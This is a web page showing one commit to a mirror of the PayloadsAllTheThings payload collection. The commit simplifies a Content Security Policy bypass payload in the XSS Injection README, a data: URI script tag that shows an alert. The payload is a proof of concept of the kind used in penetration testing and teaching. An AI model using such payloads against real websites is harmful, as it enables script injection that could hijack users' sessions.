ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 02:46:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #429 from mschader/patch-1

Browse Source 
XSS: Remove unnecessary complexity from CSP bypass payload
This commit is contained in:
Swissky 2021-10-01 17:00:09 +02:00 committed by GitHub
commit b0d96cb657
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
XSS Injection/README.md
View File

@ -1072,10 +1072,10 @@ Works for CSP like `script-src self`
### Bypass CSP by [@404death](https://twitter.com/404death/status/1191222237782659072) ### Bypass CSP by [@404death](https://twitter.com/404death/status/1191222237782659072)
Works for CSP like `script-src 'self' data:` Works for CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src).
```javascript ```javascript
<script ?/src="data:+,\u0061lert%281%29">/</script> <script src="data:,alert(1)">/</script>
``` ```